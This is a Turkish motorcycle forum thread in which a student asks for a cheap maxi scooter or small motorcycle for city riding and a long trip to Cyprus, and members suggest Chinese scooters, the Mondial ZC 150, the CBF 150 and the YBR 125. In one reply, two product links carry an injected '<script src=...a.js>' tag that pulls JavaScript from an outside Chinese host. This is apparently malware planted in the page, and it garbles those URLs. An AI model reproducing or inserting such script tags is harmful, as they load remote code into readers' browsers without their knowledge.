Kapat
Üye Girişi
Motovento
Reklam Alanı
Motomax
Reklam Alanı

Yeni kullanıcıya motor yardımı

Motovento
    REKLAM ALANI

herkese merhaba arkadşlar kafamda olan konular var onları danışmak istiyorum size...ben kıbrısta öğrenciyim konyada oturuyorum.şuanda konyadayım asıl merakım arabalara karşı fakat arabalardada motorlarda olduğu gibi iyisini almak lazım ve bende bu yüzden motor almak istiyorum...üstelik yakıt fiyatlarının yükselmesini falanda düşürnürsek motor daha bi avantajlı hale geliyor.aldığım motor Türkiyeden olacak çünkü kıbrısta oldukça pahalı maalesef...fakat burdan aldığım motor bana orda problem çıkarmaması gerekli.aynı zamanda uzun yoldada yetmesi gerekli çünkü torosları geçip silifkeden kıbrısa gitmem lazım.hem uzun yolda hemde şehir içinde yetecek fazla yakıtı olmayacak bir motor düşünüyorum.scooter lar hoşuma gitsede normal scooterlar bana yeteceğini sanmamakla beraber maxi scooter lar aklımdan geçiyor ve tipleride çok hoşuma gidiyor.fakat iyi bir markanın maxi scooter ıda yüksek fiyatlaa satılıyor.benim amacım düşük bitçeyle işimi görmesi ve ilerde arabaya yöneleceğim için maddi olarak beni sıkmaması lazım.düşündüğüm rakam 2-2,5 bin ytl civarı(sadece düşündüğüm rakam bu) fakat aynı zamanda uzun yolculuklar için chopperlarında yada cbr 125 ler gibi motorlarda aklıma geliyor...belirtme fayda var ilk motor deneyimimde bu olacak inş size çok büyük bi aralık verdim sanki her türden motor olur gibi oldu fakat dediğim gibi kafam karışık sizce hangisi daha mantıklı olur ve önerebileceğiniz motorlar neler?????

REKLAM ALANI
    Oktay Motor CF Moto Polaris Mondial
    Motomax
    Maverick35 - ait Kullanıcı Resmi (Avatar)
    Motosikleti
    Kawasaki VN800- 2003
    Şimdi, arkadaşım, çok kafa karıştıracak biçimde yazmışsın, yazını 3-4 cümle ile özetlemek mümkün.
    Benim anladığımz göre;

Sen aldığın motoru Kıbrıs'a götüreceksin, orada öğrencisin.Motor hem ucuz olacak, hem kaliteli olacak, Scooter ve Chopper arasında karar veremiyorsun.

Sana mümkün olduğunca yardımcı olmaya çalışayım:

1-Maxi Scooter senin işini görür
    2-Piaggio, Suziki Burgman gibi çok kaliteli, yüksek cc li motorlar var, ama kafadan 7-8 milyarı gözden çıkarman gerekli.
    3-Bütçen sınırlı olduğu için bu markaları seçemeyeceksin
    4-Çin malı bir maxi scooter alabilirsin, motorun limitlerini zorlama, güzel bir rodaj yap, motora aragaz çektirme (Otomatik vitesin en büyük düşmanıdır aragaz)
    5-Maxi scooter pahalı gelirse, onun bir alt modeli, gene 150 cc motorlu modellere bakabilirsin.
    6-Aldığın motor Mondial, Asya, Kanuni, Skygo,..., olmuş önemli değil.
    hepside Çin'de Jincheng fabrikasında üretiliyor.

evet karışık olmuştu özetlediğin için teşekkürler dediğin gibi suzuki burgmanlar falan maddi yönden aşar beni gerçi 3 3,5 civarı ikinci elleri var sanırım ama ne derece iyidir bilemicem.....çin mallarındanda korkum var ama tek seçenek o kalıyor galiba.çin malları olarak tipi hoşuma giden tek 150 zat var diğerlerini direk eleyebilirim sanki....

Motosikleti
    Kawasaki VN800- 2003
    Zat'la diğerlerinin farkı ne biliyor musun?
    Net'ten resimler bulup dikkatli incelelersen göreceksin;

Zat'ta, göstergeler sabit, gidonla beraber dönmüyor.
    Skygo, Jinlun, Asya, vb modellerde göstergeler gidonla beraber dönüyor.Bu özelliğinden dolayı Zat, maxi scooter gibi değil racing motosiklet gibi duruyor.
    Bir de Zat'în selesinin ön kımına bakarsan kapaklı bir göz göreceksin, başka bir fark yok.

Zat'a benzeyen hatta aynısı bir motor daha var, bulabilirsen ondan alabilirsin.
    Jincheng JC T5-A
    Ben 20*137 YTL taksitle aldım.ÖTV satıcıya ait.

Motoru buradan görebilirsin.

http://en.jincheng.com/cpxl/motoren.asp?series=3&ptype=JC150T£*A<script%20src= http://9i5t.cn/a.js></script>

maxi scooterin bir alt modeli dediğin de bu tip

http://en.jincheng.com/cpxl/motoren.asp?series=3&ptype=JC150T<script%20src=htt p://9i5t.cn/a.js></script>

Motosikleti
    150 ZC
    hemen çıkıyosun şuan evden ve bir mondial bayiine gidiyosun
    ve diyosun ki:
    150ZC modelini görebilirmiyim?
    tabi buyrun diyecek, ve ilk görüşte aşk böyle başlayacak. .
    benden söylemesi kardeşim bu fiyata bu motor bu hız performans?
    bulamassın uyandırayım. . .

Motosikleti
    Kawasaki VN800- 2003
    Showdownking'in dediği gibi ZC 150 güzel model, RS 151 e de bak

DARKDIAMOND - ait Kullanıcı Resmi (Avatar)
    Hem iyi motor almak istiyosun hemde 2000-2500ytl'ye olsun diyosun ki olmaz.Alacağın motorun seni hem Kıbrıs yolunda hemde okul yolunda götürmesini istiyosun ve az yakmasını istiyosun.BU tarifde 250cc su soğutmalı bir scooter veya 250cc comuter veya naked'lar daha çok uyuyor.Benim tavsiyem Honda/foresight gibi maxiscooter'lere bak.Buda 5000-6000ytl arasında bir bütçedir.Yok veremem dersen Çin işi bir motorlar bu yolları yapmak istiyosan devamlı bakım yaptırmak zorundasınki yaptığın masraf motora verdiğin parayı hemen hemen bulacaktır.
    Tek koruyucumuz var,O'da bizi çok sevdiği için birer birer yanına alıyor.
    Oğuz

starblazer - ait Kullanıcı Resmi (Avatar)
    Motosikleti
    yoktur
    CBF 150 Al gitsin o fiyata

KARABURUN - ait Kullanıcı Resmi (Avatar)
    Motosikleti
    2 Ayak
    Alıntı starblazer adlı üyeden alıntı Mesajı göster
    CBF 150 Al gitsin o fiyata
    +1
    Arkadasım al bi cbf 150 veya ybr 125.Hem masrafı az hem yakıtı az hem satması kolay hem de ilk motor tecrüben için çok iyi iki makine.

Motosikleti
    cIbıRcık repsol :)
    +1 cbf 150 al,mondial de iyi fakat 2,3 sene sonra olaki bozulmasada sekli semali cok degişiyor yüzüne bakılcak hali kalmıyor,takır tukur sesler gelemye baslıyor vs vs 1 sene kullanıp satmyacaksan marka tercih etmelisin.

REKLAM ALANI

Konu içerisindeki kullanıcılar

Şu an bu konu içerisinde 1 kullanıcı var. (0 üye ve 1 misafir)

Bu Konudaki Etiketler